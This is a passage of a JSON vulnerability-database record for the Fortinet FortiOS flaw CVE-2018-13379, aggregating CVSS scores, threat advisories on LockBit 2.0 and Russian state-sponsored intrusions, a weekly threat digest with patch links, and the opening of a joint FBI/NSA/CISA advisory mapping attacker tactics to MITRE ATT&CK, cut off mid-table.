{"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-06-04T00:00:00", "type": "attackerkb", "title": "CVE-2018-13379 Path Traversal in Fortinet FortiOS", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812"], "modified": "2021-07-27T00:00:00", "id": "AKB:35B88369-C440-49C0-98FF-C50E258FB32C", "href": "https://attackerkb.com/topics/VEc81wfDS7/cve-2018-13379-path-traversal-in-fortinet-fortios/rapid7-analysis", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hivepro": [{"lastseen": "2022-03-15T12:02:03", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here Since September 2021, LockBit 2.0 has targeted 500+ organizations in vital areas globally. The most recent attack targeted well-known tire producer Bridgestone, software behemoth Accenture, and the French Ministry of Justice. LockBit 2.0 ransomware compromises victim networks through a variety of techniques, including, but not limited to, purchased access, unpatched vulnerabilities, insider access, and zero-day exploit. Some of the know vulnerabilities exploited are CVE-2021-22986 affecting BIG-IP products and CVE-2018-13379 impacting FortiOS. The ransomware first assesses the system and user language settings and only targets those that do not match a predefined list of Eastern European languages. It then erases system logs and shadow copies on disk as soon as the infection begins. In addition to this, it also collects system data such as hostname, host configuration, domain information, local drive configuration, remote shares, and mounted external storage devices. Furthermore, it tries to encrypt all data stored to any local or remote device, but it ignores files linked with critical system operations. After the encryption, the ransomware deletes itself from the disk and creates persistence upon startup. Lockbit 2.0 affiliates typically employ the Stealbit program received straight from the Lockbit panel to exfiltrate certain file types prior to encryption. The affiliate can adjust the desired file types to adapt the attack to the target. Additionally, they frequently employ publicly accessible file-sharing platforms such as privatlab.net, anonfiles.com, sendspace.com, fex.net, transfer.sh, and send.exploit.in. While some of these programs and services may serve legitimate reasons, others may be exploited by threat actors. The Organizations can mitigate the risk by following the recommendations: \u2022Use multi-factor authentication. \u2022Keep all operating systems and software up to date. \u2022Remove unnecessary access to administrative shares. \u2022Maintain offline backups of data and Ensure all backup data is encrypted and immutable. \u2022Enable protected files in the Windows Operating System for critical files. The Mitre TTPs commonly used by LockBit 2.0 are: TA0040 - ImpactTA0042 - Resource Development TA0001 - Initial Access TA0002 - Execution TA0003 - Persistence TA0005 - Defense Evasion TA0006 - Credential Access TA0007 - Discovery TA0008 - Lateral Movement TA0009 - Collection TA0011 - Command and ControlTA0010 - ExfiltrationT1190: Exploit Public-Facing ApplicationT1047: Windows Management InstrumentationT1059: Command and Scripting InterpreterT1059.003: Windows Command ShellT1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup FolderT1055: Process InjectionT1070.004: Indicator Removal on Host: File DeletionT1112: Modify RegistryT1497: Virtualization/Sandbox EvasionT1110: Brute ForceT1056.004: Credential API HookingT1012: Query RegistryT1018: Remote System DiscoveryT1057: Process DiscoveryT1021: Remote ServicesT1021.001: Remote Services: Remote Desktop ProtocolT1021.002: Remote Services: SMB/Windows Admin SharesT1056.004: Credential API HookingT1090.003: Proxy: Multi-hop ProxyT1567.002: Exfiltration Over Web Service: Exfiltration to Cloud StorageT1486: Data Encrypted for ImpactT1490: Inhibit System Recovery Vulnerability Details Indicators of Compromise (IoCs) Recent Breaches bridgestoneamericas.com accenture.com justice.fr Patch Link https://www.fortiguard.com/psirt/FG-IR-18-384 https://support.f5.com/csp/article/K03009991 References https://www.ic3.gov/Media/News/2022/220204.pdf https://threatpost.com/accenture-lockbit-ransomware-attack/168594/", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-15T10:07:18", "type": "hivepro", "title": "LockBit 2.0 Ransomware affiliates targeting Renowned Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-22986"], "modified": "2022-03-15T10:07:18", "id": "HIVEPRO:1825C4046C6054693C41D7D5DFD7BA10", "href": "https://www.hivepro.com/lockbit-2-0-ransomware-affiliates-targeting-renowned-organizations/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T13:30:09", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here In a joint cybersecurity advisory, the Federal Bureau of Investigation (FBI), the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA) revealed that Russian state-sponsored threat actors targeted U.S. defense contractors from January 2020 to February 2022. The threat actors exfiltrated sensitive data from small and large companies in the U.S. working on defense and intelligence contracts, including missile development, vehicle &amp; aircraft and software development. Threat actors gain initial access by using brute force to identify valid account credentials for domain and M365 accounts. Using compromised M365 credentials, including global admin accounts, the threat actors can gain access to M365 resources such as SharePoint pages user-profiles and user emails. They further used harvested credentials in conjunction with known vulnerabilities CVE-2020-0688 &amp; CVE-2020-17144 in the Microsoft exchange server to escalate privileges and gain remote code execution (RCE) on the exposed applications. In addition, they have exploited CVE-2018-13379 on FortiClient to obtain credentials to access networks. After gaining access to networks, the threat actors map the Active Directory (AD) and connect to domain controllers, from which they exfiltrated credentials and export copies of the AD database &quot;ntds.dit&quot;. In multiple breaches, they maintained persistence for at least 6 months in the network continuously exfiltrating sensitive emails and data. Organizations can mitigate the risk by following the recommendations: \u2022Monitor the use of stolen credentials. \u2022Keep all operating systems and software up to date. \u2022Enable multifactor authentication (MFA) for all users, without exception. \u2022 The Techniques commonly used by Russian cyber actor, APT28 are: TA0043: Reconnaissance TA0001: Initial Access TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0007: Discovery TA0009: Collection TA0003: Persistence TA0008: Lateral Movement TA0011: Command and Control T1027: Obfuscated Files or Information T1133: External Remote Services T1190: Exploit Public-Facing Application T1083: File and Directory Discovery T1482: Domain Trust Discovery T1213.002: Data from Information Repositories: SharePoint T1090.003: Proxy: Multi-hop Proxy T1589.001: Gather Victim Identity Information: Credentials T1003.003: OS Credential Dumping: NTDS T1110.003: Brute Force: Password Spraying T1566.002: Phishing: Spearphishing Link T1078.002: Valid Accounts: Domain Accounts T1078.004: Valid Accounts: Cloud Accounts Actor Details Vulnerability Details References https://www.cisa.gov/uscert/ncas/alerts/aa22-047a", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-18T12:20:35", "type": "hivepro", "title": "Russian state-sponsored cyber actors targeting U.S. critical infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2020-0688", "CVE-2020-17144"], "modified": "2022-02-18T12:20:35", "id": "HIVEPRO:FD730BCAD086DD8C995242D13B38EBC8", "href": "https://www.hivepro.com/russian-state-sponsored-cyber-actors-targeting-u-s-critical-infrastructure/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-03-23T09:28:58", "description": "For a detailed threat digest, download the pdf file here Published Vulnerabilities Interesting Vulnerabilities Active Threat Groups Targeted Countries Targeted Industries ATT&amp;CK TTPs 567 22 5 36 15 60 The third week of March 2022 witnessed the discovery of 567 vulnerabilities out of which 22 gained the attention of Threat Actors and security researchers worldwide. Among these 22, there were 2 vulnerabilities about which the National vulnerability Database (NVD) is awaiting analysis, while 2 more of them are undergoing reanalysis, and 14 were not present in the NVD at all. Hive Pro Threat Research Team has curated a list of 22 CVEs that require immediate action. Furthermore, we also observed five threat actor groups being highly active in the last week. The Sandworm Team, a well-known Russian threat actor group popular for sabotage and destruction, was observed using a new malware known as Cyclops Blink. Additionally, a new threat actor, Exotic Lily, was acting as Initial Access Broker (IAB) for Conti and Diavol ransomware groups exploiting the zero-day vulnerability in Microsoft MSHTML (CVE-2021-40444). Another threat actor from Russia, UAC-0056, was observed targeting Western European and North American ministries as well as private sectors. Two ransomware gangs, Pandora and Lockbit, were active across different organizations around the globe. Common TTPs which could potentially be exploited by these threat actors or CVEs can be found in the detailed section below. Detailed Report: Interesting Vulnerabilities: Vendor CVEs Patch Link CVE-2021-20083 https://wordpress.org/news/2022/03/wordpress-5-9-2-security-maintenance-release/ CVE-2022-24728 CVE-2022-24729 https://www.drupal.org/project/drupal/releases/9.2.15 https://www.drupal.org/project/drupal/releases/9.3.8 CVE-2022-0337 https://download3.operacdn.com/pub/opera/desktop/84.0.4316.42/win/Opera_84.0.4316.42_Setup_x64.exe CVE-2022-0337 https://files02.tchspt.com/temp/MicrosoftEdgeSetup.exe Vendor CVEs Patch Link CVE-2022-0971 CVE-2022-0972 CVE-2022-0973 CVE-2022-0974 CVE-2022-0975 CVE-2022-0976 CVE-2022-0977 CVE-2022-0978 CVE-2022-0979 CVE-2022-0980 CVE-2022-0337 https://www.google.com/intl/en/chrome/?standalone=1 CVE-2022-0778 https://github.com/openssl/openssl/commit/a466912611aa6cbdf550cd10601390e587451246 https://github.com/openssl/openssl/commit/3118eb64934499d93db3230748a452351d1d9a65 CVE-2022- 25636 https://git.kernel.org/pub/scm/linux/kernel/git/netfilter/nf.git/snapshot/nf-b1a5983f56e371046dcf164f90bfaf704d2b89f6.tar.gz CVE-2021-22986 https://support.f5.com/csp/article/K03009991 CVE-2018-13379 https://www.fortiguard.com/psirt/FG-IR-18-384 CVE-2021-25220 CVE-2022-0396 CVE-2022-0635 CVE-2022-0667 https://www.isc.org/bind/ Active Actors: Icon Name Origin Motive Exotic Lily Unknown Ecrime UAC-0056 (SaintBear, UNC2589, TA471) Russia Information theft Pandora Ransomware Gang Unknown Ecrime, Information theft, and Financial gain Lockbit 2.0 Unknown Financial gain Sandworm Team (ELECTRUM, Telebots, IRON VIKING, BlackEnergy (Group), Quedagh, VOODOO BEAR) Russia Sabotage anddestruction Targeted Location: Targeted Sectors: Common TTPs: TA0042: Resource Development TA0001: Initial Access TA0002: Execution TA0003: Persistence TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access T1587: Develop Capabilities T1190: Exploit Public-Facing Application T1059: Command and Scripting Interpreter T1547: Boot or Logon Autostart Execution T1547: Boot or Logon Autostart Execution T1562: Impair Defenses T1557: Adversary-in-the-Middle T1587.001: Malware T1133: External Remote Services T1059.007: JavaScript T1547.001: Registry Run Keys / Startup Folder T1547.001: Registry Run Keys / Startup Folder T1562.004: Disable or Modify System Firewall T1110: Brute Force T1588: Obtain Capabilities T1566: Phishing T1059.004: Unix Shell T1037: Boot or Logon Initialization Scripts T1037: Boot or Logon Initialization Scripts T1070: Indicator Removal on Host T1110.001: Password Guessing T1588.006: Vulnerabilities T1566.001: Spearphishing Attachment T1059.003: Windows Command Shell T1037.004: RC Scripts T1037.004: RC Scripts T1070.004: File Deletion T1056: Input Capture T1078: Valid Accounts T1203: Exploitation for Client Execution T1133: External Remote Services T1068: Exploitation for Privilege Escalation T1036: Masquerading T1056.004: Credential API Hooking T1204: User Execution T1556: Modify Authentication Process T1055: Process Injection T1036.005: Match Legitimate Name or Location T1556: Modify Authentication Process T1204.002: Malicious File T1137: Office Application Startup T1078: Valid Accounts T1556: Modify Authentication Process T1003: OS Credential Dumping T1047: Windows Management Instrumentation T1542: Pre-OS Boot T1112: Modify Registry T1003.003: NTDS T1542.001: System Firmware T1027: Obfuscated Files or Information T1137: Office Application Startup T1027.006: HTML Smuggling T1137.001: Office Template Macros T1027.002: Software Packing T1078: Valid Accounts T1542: Pre-OS Boot T1542.001: System Firmware T1055: Process Injection T1078: Valid Accounts T1497: Virtualization/Sandbox Evasion TA0007: Discovery TA0008: Lateral Movement TA0009: Collection TA0011: Command and Control TA0010: Exfiltration TA0040: Impact T1087: Account Discovery T1021: Remote Services T1557: Adversary-in-the-Middle T1071: Application Layer Protocol T1041: Exfiltration Over C2 Channel T1485: Data Destruction T1083: File and Directory Discovery T1021.001: Remote Desktop Protocol T1560: Archive Collected Data T1071.001: Web Protocols T1567: Exfiltration Over Web Service T1486: Data Encrypted for Impact T1057: Process Discovery T1021.002: SMB/Windows Admin Shares T1560.001: Archive via Utility T1132: Data Encoding T1567.002: Exfiltration to Cloud Storage T1565: Data Manipulation T1012: Query Registry T1056: Input Capture T1132.002: Non-Standard Encoding T1499: Endpoint Denial of Service T1018: Remote System Discovery T1056.004: Credential API Hooking T1573: Encrypted Channel T1499.004: Application or System Exploitation T1518: Software Discovery T1573.002: Asymmetric Cryptography T1490: Inhibit System Recovery T1082: System Information Discovery T1008: Fallback Channels T1498: Network Denial of Service T1497: Virtualization/Sandbox Evasion T1105: Ingress Tool Transfer T1498.001: Direct Network Flood T1571: Non-Standard Port T1090: Proxy T1090.003: Multi-hop Proxy Threat Advisories: Pandora Ransomware Targets Multiple Plants around the Globe LockBit 2.0 Ransomware affiliates targeting Renowned Organizations Sandworm Team using a new modular malware Cyclops Blink Environment Variables Leak affect Multiple browsers Major Content Management Systems affected by Multiple vulnerabilities New Threat Actor Exotic Lily acting as Initial Access Broker for Conti and Diavol ransomware group Russian threat actors leveraging misconfigured multifactor authentication to exploit PrintNightmare vulnerability Russian threat actor UAC-0056 targets European countries Multiple Google Chrome Vulnerabilities affects all Platforms Attackers could gain root access using vulnerability in Linux Kernel Netfilter Firewall OpenSSL exposed to Denial-of-service vulnerability causing Infinite Loop Attackers Escape Kubernetes Containers using \u201ccr8escape\u201d Vulnerability in CRI-O Russia under Attack from New RURansom Wiper", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-23T04:17:40", "type": "hivepro", "title": "Weekly Threat Digest: 14 \u2013 20 March 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-20083", "CVE-2021-22986", "CVE-2021-25220", "CVE-2021-40444", "CVE-2022-0337", "CVE-2022-0396", "CVE-2022-0635", "CVE-2022-0667", "CVE-2022-0778", "CVE-2022-0971", "CVE-2022-0972", "CVE-2022-0973", "CVE-2022-0974", "CVE-2022-0975", "CVE-2022-0976", "CVE-2022-0977", "CVE-2022-0978", "CVE-2022-0979", "CVE-2022-0980", "CVE-2022-24728", "CVE-2022-24729"], "modified": "2022-03-23T04:17:40", "id": "HIVEPRO:B772F2F7B4C9AE8452D1197E2E240204", "href": "https://www.hivepro.com/weekly-threat-digest-14-20-march-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ics": [{"lastseen": "2023-03-14T18:28:23", "description": "### Summary\n\n_Actions to Help Protect Against Russian State-Sponsored Malicious Cyber Activity:_ \n\u2022 Enforce multifactor authentication. \n\u2022 Enforce strong, unique passwords. \n\u2022 Enable M365** **Unified Audit Logs. \n\u2022 Implement** **endpoint detection and response tools.\n\nFrom at least January 2020, through February 2022, the Federal Bureau of Investigation (FBI), National Security Agency (NSA), and Cybersecurity and Infrastructure Security Agency (CISA) have observed regular targeting of U.S. cleared defense contractors (CDCs) by Russian state-sponsored cyber actors. The actors have targeted both large and small CDCs and subcontractors with varying levels of cybersecurity protocols and resources. These CDCs support contracts for the U.S. Department of Defense (DoD) and Intelligence Community in the following areas:\n\n * Command, control, communications, and combat systems;\n * Intelligence, surveillance, reconnaissance, and targeting;\n * Weapons and missile development;\n * Vehicle and aircraft design; and\n * Software development, data analytics, computers, and logistics. \n\nHistorically, Russian state-sponsored cyber actors have used common but effective tactics to gain access to target networks, including spearphishing, credential harvesting, brute force/password spray techniques, and known vulnerability exploitation against accounts and networks with weak security. These actors take advantage of simple passwords, unpatched systems, and unsuspecting employees to gain initial access before moving laterally through the network to establish persistence and exfiltrate data. \n\nIn many attempted compromises, these actors have employed similar tactics to gain access to enterprise and cloud networks, prioritizing their efforts against the widely used Microsoft 365 (M365) environment. The actors often maintain persistence by using legitimate credentials and a variety of malware when exfiltrating emails and data.\n\nThese continued intrusions have enabled the actors to acquire sensitive, unclassified information, as well as CDC-proprietary and export-controlled technology. The acquired information provides significant insight into U.S. weapons platforms development and deployment timelines, vehicle specifications, and plans for communications infrastructure and information technology. By acquiring proprietary internal documents and email communications, adversaries may be able to adjust their own military plans and priorities, hasten technological development efforts, inform foreign policymakers of U.S. intentions, and target potential sources for recruitment. Given the sensitivity of information widely available on unclassified CDC networks, the FBI, NSA, and CISA anticipate that Russian state-sponsored cyber actors will continue to target CDCs for U.S. defense information in the near future. These agencies encourage all CDCs to apply the recommended mitigations in this advisory, regardless of evidence of compromise.\n\nFor additional information on Russian state-sponsored cyber activity, see CISA's webpage, [Russia Cyber Threat Overview and Advisories](<https://www.us-cert.cisa.gov/russia>).\n\nClick here for a PDF version of this report.\n\n### Threat Details\n\n#### **Targeted Industries and Assessed Motive**\n\nRussian state-sponsored cyber actors have targeted U.S. CDCs from at least January 2020, through February 2022. The actors leverage access to CDC networks to obtain sensitive data about U.S. defense and intelligence programs and capabilities. Compromised entities have included CDCs supporting the U.S. Army, U.S. Air Force, U.S. Navy, U.S. Space Force, and DoD and Intelligence programs.\n\nDuring this two-year period, these actors have maintained persistent access to multiple CDC networks, in some cases for at least six months. In instances when the actors have successfully obtained access, the FBI, NSA, and CISA have noted regular and recurring exfiltration of emails and data. For example, during a compromise in 2021, threat actors exfiltrated hundreds of documents related to the company\u2019s products, relationships with other countries, and internal personnel and legal matters.\n\nThrough these intrusions, the threat actors have acquired unclassified CDC-proprietary and export-controlled information. This theft has granted the actors significant insight into U.S. weapons platforms development and deployment timelines, plans for communications infrastructure, and specific technologies employed by the U.S. government and military. Although many contract awards and descriptions are publicly accessible, program developments and internal company communications remain sensitive. Unclassified emails among employees or with government customers often contain proprietary details about technological and scientific research, in addition to program updates and funding statuses. See figures 1 and 2 for information on targeted customers, industries, and information.\n\n\n\n_Figure 1. Targeted Industries_\n\n\n\n_Figure 2. Exfiltrated Information_\n\n#### \n\n#### **Threat Actor Activity**\n\n_**Note:** This advisory uses the MITRE ATT&amp;CK\u00ae for Enterprise framework, version 10. See the [ATT&amp;CK for Enterprise](<https://attack.mitre.org/versions/v10/techniques/enterprise/>) for all referenced threat actor tactics and techniques. See the Tactics, Techniques, and Procedures (TTPs) section for a table of the threat actors\u2019 activity mapped to MITRE ATT&amp;CK tactics and techniques._\n\n##### _**Initial Access **_\n\nRussian state-sponsored cyber actors use brute force methods, spearphishing, harvested credentials, and known vulnerabilities to gain initial access to CDC networks.\n\n * Threat actors use brute force techniques [[T1110](<https://attack.mitre.org/versions/v10/techniques/T1110>)] to identify valid account credentials [[T1589.001](<https://attack.mitre.org/versions/v10/techniques/T1589/001/>)] for domain and M365 accounts. After obtaining domain credentials, the actors use them to gain initial access to the networks. _**Note:** For more information, see joint NSA-FBI-CISA Cybersecurity Advisory: [Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>)._\n * Threat actors send spearphishing emails with links to malicious domains [[T1566.002](<https://attack.mitre.org/versions/v10/techniques/T1566/002>)] and use publicly available URL shortening services to mask the link [[T1027](<https://attack.mitre.org/versions/v10/techniques/T1027>)]. Embedding shortened URLs instead of actor-controlled malicious domains is an obfuscation technique meant to bypass virus and spam scanning tools. The technique often promotes a false legitimacy to the email recipient, increasing the probability of a victim\u2019s clicking on the link. \n * The threat actors use harvested credentials in conjunction with known vulnerabilities\u2014for example, CVE-2020-0688 and CVE-2020-17144\u2014on public-facing applications [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>), [T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)], such as virtual private networks (VPNs), to escalate privileges and gain remote code execution (RCE) on the exposed applications.[[1](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>)] In addition, threat actors have exploited CVE-2018-13379 on FortiClient to obtain credentials to access networks. \n * As CDCs find and patch known vulnerabilities on their networks, the actors alter their tradecraft to seek new means of access. This activity necessitates CDCs maintain constant vigilance for software vulnerabilities and out-of-date security configurations, especially in internet-facing systems.\n\n##### _**Credential Access** _\n\nAfter gaining access to networks, the threat actors map the Active Directory (AD) and connect to domain controllers, from which they exfiltrate credentials and export copies of the AD database `ntds.dit` [[T1003.003](<https://attack.mitre.org/versions/v10/techniques/T1003/003/>)]. In multiple instances, the threat actors have used Mimikatz to dump admin credentials from the domain controllers. \n\n##### _**Collection**_\n\nUsing compromised M365 credentials, including global admin accounts, the threat actors can gain access to M365 resources, including SharePoint pages [[T1213.002](<https://attack.mitre.org/versions/v10/techniques/T1213/002/>)], user profiles, and user emails [[T1114.002](<https://attack.mitre.org/versions/v10/techniques/T1114/002/>)].\n\n##### _**Command and Control**_\n\nThe threat actors routinely use virtual private servers (VPSs) as an encrypted proxy. The actors use VPSs, as well as small office and home office (SOHO) devices, as operational nodes to evade detection [[T1090.003](<https://attack.mitre.org/versions/v10/techniques/T1090/003/>)].\n\n##### _**Persistence**_\n\nIn multiple instances, the threat actors maintained persistent access for at least six months. Although the actors have used a variety of malware to maintain persistence, the FBI, NSA, and CISA have also observed intrusions that did not rely on malware or other persistence mechanisms. In these cases, it is likely the threat actors relied on possession of legitimate credentials for persistence [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>)], enabling them to pivot to other accounts, as needed, to maintain access to the compromised environments.\n\n#### **Tactics, Techniques, and Procedures**\n\nThe following table maps observed Russian state-sponsored cyber activity to the MITRE ATT&amp;CK for Enterprise framework. Several of the techniques listed in the table are based on observed procedures in contextual order. Therefore, some of the tactics and techniques listed in their respective columns appear more than once. See Appendix A for a functional breakdown of TTPs. _**Note:** for specific countermeasures related to each ATT&amp;CK technique, see the [Enterprise Mitigations](<https://attack.mitre.org/mitigations/>) section and [MITRE D3FEND](<https://d3fend.mitre.org/>)_\u2122. \n\n\n_Table 1: Observed Tactics, Techniques, and Procedures (TTPs)_\n\nTactic | Technique | Procedure \n---|---|--- \n \n**Reconnaissance [[TA0043](<https://attack.mitre.org/versions/v10/tactics/TA0043/>)]**\n\n**Credential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006/>)]**\n\n| \n\nGather Victim Identity Information: Credentials [[T1589.001](<https://attack.mitre.org/versions/v10/techniques/T1589/001/>)] \n\nBrute Force [[T1110](<https://attack.mitre.org/versions/v10/techniques/T1110/003/>)]\n\n| Threat actors used brute force to identify valid account credentials for domain and M365 accounts. After obtaining domain credentials, the actors used them to gain initial access. \n**Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]** | External Remote Services [[T1133](<https://attack.mitre.org/versions/v10/techniques/T1133>)] | Threat actors continue to research vulnerabilities in Fortinet\u2019s FortiGate VPN devices, conducting brute force attacks and leveraging CVE-2018-13379 to gain credentials to access victim networks. [[2](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/CSA-MITIGATING-RECENT-VPN-VULNERABILITIES.PDF>)] \n \n**Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]**\n\n**Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v10/tactics/TA0004>)]**\n\n| \n\nValid Accounts [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>)]\n\nExploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)]\n\n| Threat actors used credentials in conjunction with known vulnerabilities on public-facing applications, such as virtual private networks (VPNs)\u2014CVE-2020-0688 and CVE-2020-17144\u2014to escalate privileges and gain remote code execution (RCE) on the exposed applications. [[3](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>)] \n \n**Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]**\n\n**Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v10/tactics/TA0005>)]**\n\n| \n\nPhishing: Spearphishing Link [[T1566.002](<https://attack.mitre.org/versions/v10/techniques/T1566/002>)]\n\nObfuscated Files or Information [[T1027](<https://attack.mitre.org/versions/v10/techniques/T1027>)]\n\n| Threat actors sent spearphishing emails using publicly available URL shortening services. Embedding shortened URLs instead of the actor-controlled malicious domain is an obfuscation technique meant to bypass virus and spam scanning tools. The technique often promotes a false legitimacy to the email recipient and thereby increases the possibility that a victim clicks on the link. \n \n**Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]**\n\n**Credential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006/>)]**\n\n| \n\nOS Credential Dumping: NTDS [[T1003.003](<https://attack.mitre.org/versions/v10/techniques/T1003/003/>)]\n\nValid Accounts: Domain Accounts [[T1078.002](<https://attack.mitre.org/versions/v10/techniques/T1078/002/>)]\n\n| Threat actors logged into a victim\u2019s VPN server and connected to the domain controllers, from which they exfiltrated credentials and exported copies of the AD database `ntds.dit`. \n \n**Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]**\n\n**Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v10/tactics/TA0004>)]**\n\n**Collection [[TA0009](<https://attack.mitre.org/versions/v10/tactics/TA0009/>)]**\n\n| \n\nValid Accounts: Cloud Accounts [[T1078.004](<https://attack.mitre.org/versions/v10/techniques/T1078/004/>)]\n\nData from Information Repositories: SharePoint [[T1213.002](<https://attack.mitre.org/versions/v9/techniques/T1213/002/>)]\n\n| In one case, the actors used valid credentials of a global admin account within the M365 tenant to log into the administrative portal and change permissions of an existing enterprise application to give read access to all SharePoint pages in the environment, as well as tenant user profiles and email inboxes. \n \n**Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]**\n\n**Collection [[TA0009](<https://attack.mitre.org/versions/v10/tactics/TA0009/>)]**\n\n| \n\nValid Accounts: Domain Accounts [[T1078.002](<https://attack.mitre.org/versions/v10/techniques/T1078/002/>)]\n\nEmail Collection [[T1114](<https://attack.mitre.org/versions/v10/techniques/T1114>)]\n\n| In one case, the threat actors used legitimate credentials to exfiltrate emails from the victim's enterprise email system. \n \n**Persistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003/>)]**\n\n**Lateral Movement 